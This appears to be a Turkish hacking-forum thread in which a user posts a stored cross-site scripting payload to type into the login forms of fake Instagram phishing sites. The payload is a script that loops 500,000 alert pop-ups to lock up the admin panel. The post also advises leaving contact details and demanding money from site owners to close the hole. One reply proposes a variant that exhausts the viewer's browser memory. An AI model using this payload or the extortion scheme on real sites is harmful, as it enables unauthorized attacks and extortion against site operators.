Sahte İnstagram Sitesi Açan Sanalcı Lamerları Hackleyin !

COLLECTOR45

Yeni üye
15 Mar 2022
8
16
IDE
Merhaba. Ben Collector45.

Saldırının Adı: Cross Site Scripting Attack
Bu scriptleri yazan arkadaşlar sadece phish*ng sitesi yazabilen yazılımcı bozuntusu oldukları için, htmlspecialchars dediğimiz fonksiyondan muzdaripler. O yüzden yazdığımız her script sitelerinin neresine düşüyorsa artık, genelde admin panele düşer orada sizin scriptiniz çalışıyor . Sunucudan silene kadar sitesi etkisiz hale geliyor.

(Kullanıcı Adı veya Şifre) Form Inputlara girmeniz gereken kod;

JavaScript:
<script>for (var collector45 = 0; collector45 < 500000; collector45++){alert("COLLECTOR45 TARAFINDAN HACKLENDİNİZ. İLETİŞİM=> ICQ:COLLECTOR45")}</script>

Sonuç:
j4b0vzv.png

Size minik bir ticaret tekniği, Bu şekilde sanalcılara musallat olun iletişim adresinizi bırakın. Bir süre sonra size ulaşıp açığı kapatmanızı isteyecekler; Para talep edin.

taklan_br_12

Katılımcı Üye
20 Kas 2021
425
99

Bu scriptleri yazan arkadaşlar sadece phish*ng sitesi yazabilen yazılımcı bozuntusu oldukları için, htmlspecialchars dediğimiz fonksiyondan muzdaripler. O yüzden yazdığımız her script sitelerinin neresine düşüyorsa artık, genelde admin panele düşer orada sizin scriptiniz çalışıyor . Sunucudan silene kadar sitesi etkisiz hale geliyor.

JavaScript:
<script>for (var collector45 = 0; collector45 < 500000; collector45++){alert("COLLECTOR45 TARAFINDAN HACKLENDİNİZ. İLETİŞİM=> ICQ:COLLECTOR45")}</script>

Sonuç:
j4b0vzv.png

Size minik bir ticaret tekniği, Bu şekilde sanalcılara musallat olun iletişim adresinizi bırakın. Bir süre sonra size ulaşıp açığı kapatmanızı isteyecekler; Para talep edin.
Elinize kolunuza saglık hocam gelecekte işe yarar bir bilgi

N S

Uzman üye
19 Haz 2013
1,133
204
For yerine while yazsan daha temiz olmaz mi :) veya recursive function ? Hatta recursive functuion icerisinde surekli degisken tanimlat siteyi acan kisinin bellegini de patlat ??

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,932
1,814
31
MyKrallife

JavaScript:

Sonuç:
j4b0vzv.png

Elinize sağlık

Doluxiz

Yeni üye
1 Ara 2020
44
17
Ne güldüm varya şöyle bir metin hayal ettim "Oğlum dışardaki adamlar timsaha t... Seni kulağından..." 😁

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.